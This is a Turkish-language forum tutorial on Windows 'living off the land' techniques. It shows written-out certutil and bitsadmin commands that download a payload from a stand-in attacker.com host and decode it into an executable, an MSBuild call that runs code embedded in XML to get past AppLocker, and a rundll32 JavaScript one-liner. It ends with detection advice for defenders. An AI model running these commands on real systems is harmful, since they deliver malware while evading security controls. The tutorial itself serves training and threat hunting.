🛠️ [VIP Tactics] Living off the Land (LotL): Microsoft İmzalı Araçları Silaha Çevirmek (LOLBins)

0 Replies 1 Views
·

Leave a rating: 🛠️ [VIP Tactics] Living off the Land (LotL): Microsoft İmzalı Araçları Silaha Çevirmek (LOLBins)

You have already rated this thread. Re-rating it will remove your existing rating or review.

Rating:

Raters: 🛠️ [VIP Tactics] Living off the Land (LotL): Microsoft İmzalı Araçları Silaha Çevirmek (LOLBins)

Participants
Thread Starter #0
YASAL UYARI:Bu doküman, Red Team simülasyonları ve Threat Hunting (Tehdit Avcılığı) çalışmaları için eğitim amaçlı hazırlanmıştır. Sistem yöneticilerinin araçlarını kötüye kullanmak (Abuse), izinsiz sistemlerde suç teşkil eder.

1. Felsefe: Neden Malware İndiresin Ki?

Geleneksel saldırılarda hacker, sisteme virus.exe isimli zararlı bir dosya atmaya çalışır. Antivirüs bunu görür ve siler.

Living off the Land (LotL) felsefesi şudur: İşletim sistemi zaten dosya indirmek, kod çalıştırmak ve veri şifrelemek için onlarca araçla (Binary) doludur. Bu araçlar Microsoft tarafından dijital olarak imzalanmıştır ve işletim sisteminin "doğal" parçalarıdır.

Biz bunlara LOLBins (Living Off The Land Binaries) diyoruz.

Saldırgan; dosya indirmek için wget kurmaz, certutil kullanır. Kod çalıştırmak için zararlı .exe derlemez, msbuild kullanır.


2. Cephanelik: En Popüler ve Tehlikeli LOLBins

İşletim sisteminde yüzlerce LOLBin vardır. Ancak VIP seviyesinde bilmeniz gereken, EDR/AV atlatma potansiyeli en yüksek olan "Büyük Dörtlü" şunlardır:

A. Certutil.exe (Sertifika Otoritesi Aracı)

Normalde sertifika yönetimi için kullanılır. Ancak saldırganlar için mükemmel bir dosya indirme ve encode/decode aracıdır.

  • Saldırı Senaryosu: Antivirüsler internetten .exe indirmeyi engeller. Ama Base64 ile şifrelenmiş bir metin dosyasını indirmenize karışmazlar.
  • Teknik:

    1. Payload'ı Base64'e çevir ve metin dosyası yap (payload.txt).
    2. certutil ile bu metin dosyasını indir.
    3. Yine certutil ile bu dosyayı .exe'ye çevir (Decode).
CODE
12345:: 1. Dosyayı indir (Browser veya wget gibi davranır)
certutil.exe -urlcache -split -f http://attacker.com/payload.txt C:\Temp\payload.txt

:: 2. Base64'ten asıl zararlıya dönüştür
certutil.exe -decode C:\Temp\payload.txt C:\Temp\malware.exe


B. MSBuild.exe (Microsoft Build Engine)

Bu, AppLocker ve diğer "Beyaz Liste" (Whitelisting) güvenlik önlemlerini aşmanın Kralı'dır.

  • Mantık: MSBuild, .NET projelerini derlemek için vardır. Ancak .xml veya .csproj dosyaları içine gömülmüş C# kodlarını (Inline Tasks) derleyip RAM üzerinde çalıştırabilir.
  • Vuruş: Sisteme zararlı bir .exe sokmazsınız. Sadece masum görünen bir XML dosyası sokarsınız. msbuild.exe (ki kendisi güvenilir bir Windows bileşenidir) bu XML'i okur ve içindeki zararlı kodu çalıştırır.
CODE
12:: XML içindeki C# kodunu derle ve bellekte çalıştır
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Temp\malicious.xml


C. Bitsadmin.exe (Arka Plan Transfer Hizmeti)

Windows Update'in güncellemeleri indirmek için kullandığı servistir. Çok yavaştır ama çok güvenilirdir.

  • Özellik: İndirme işlemi arka planda, bant genişliği boşken yapılır. Güvenlik duvarları genellikle BITS trafiğine (Windows Update sanarak) izin verir.
CODE
12:: Arka planda sinsi indirme
bitsadmin /transfer myJob /download /priority normal http://attacker.com/tool.exe C:\Temp\tool.exe


D. Pcalua.exe (Program Compatibility Assistant)

Bu araç, eski programların yeni Windows sürümlerinde çalışmasını sağlar. Ancak bir komut satırı aracı olarak kullanıldığında, .exe veya .cpl dosyalarını güvenlik uyarılarını atlatarak çalıştırabilir.


3. LOLScripts ve LOLLibs: Sadece .EXE Değil

Tehdit sadece .exe dosyalarında değildir.

  • LOLScripts: CL_Mutexverifiers.ps1 veya Manage-bde.wsf gibi sistemin içinde gelen ve imzalı olan scriptlerdir. Bu scriptlerin içindeki fonksiyonlar manipüle edilebilir.
  • LOLLibs: rundll32.exe kullanılarak çağrılabilen DLL dosyalarıdır.
Örnek (Rundll32 ile JavaScript Çalıştırma):Komut satırından JavaScript çalıştırmak mümkün mü? Evet.

CODE
1rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";alert('Hacked');


4. Blue Team (Savunma) Perspektifi: Ayıkla Pirincin Taşını

LOLBins saldırılarını tespit etmek zordur çünkü kullanılan araçlar meşrudur. Certutil.exe'yi engelleyemezsiniz, aksi halde sistem güncellemeleri veya sertifika işlemleri bozulur.

Nasıl Tespit Edilir?

  1. Argüman Analizi: certutil çalışabilir ama -urlcache veya -decode parametreleri ile çalışıyorsa alarm üretilmelidir.
  2. Parent-Child İlişkisi: winword.exe (Word) programının cmd.exe'yi, onun da certutil.exe'yi çağırması normal bir davranış değildir. Bu zincirleme reaksiyon (Process Tree) izlenmelidir.
  3. Ağ Trafiği: bitsadmin veya certutil'in şirket dışındaki bilinmeyen bir IP adresine bağlanması şüphelidir.

5. Referans ve Kaynaklar (The Bible of LOLBins)

Bu işin ansiklopedisi LOLBAS (Living Off The Land Binaries, Scripts and Libraries) projesidir.

  • LOLBAS Project (GitHub): Her bir Windows dosyasının nasıl saldırı amacıyla kullanılabileceğini belgeleyen devasa bir arşiv.
  • GTFOBins: Bunun Linux/Unix versiyonu (Bash, Vim, Awk vb. kullanarak yetki yükseltme).

💡 VIP Notu:

2026 yılında EDR sistemleri artık standart LOLBin komutlarını tanıyor. Yeni trend "Bring Your Own Land" (BYOL). Yani saldırganın, sistemde olmayan ama Microsoft imzalı eski ve güvenlik açığı bulunan bir dosyayı (örneğin eski bir Teams yükleyicisi) yanında getirip, onun üzerinden DLL Sideloading yapmasıdır.

You must be logged in to reply.

0 quotes selected